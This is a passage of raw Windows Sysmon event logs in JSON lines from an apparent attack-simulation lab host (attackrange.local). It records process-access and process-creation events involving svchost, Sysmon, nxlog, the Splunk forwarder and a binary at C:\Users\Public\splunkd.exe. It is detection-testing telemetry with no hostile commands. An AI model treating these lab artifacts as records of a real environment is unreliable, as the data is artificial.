06:58:57.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6705,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6706,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6707,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6708,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6709,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.975\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.975","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6710,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.975\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-12B1-5F25-0000-0010BD700900}\r\nTargetProcessId: 4912\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.975","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-12B1-5F25-0000-0010BD700900}","TargetProcessId":"4912","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6711,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:58.553\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:58.553","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6712,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.007\r\nProcessGuid: {E2A3D6B1-12B3-5F25-0000-0010D7720900}\r\nProcessId: 2896\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.007","ProcessGuid":"{E2A3D6B1-12B3-5F25-0000-0010D7720900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT 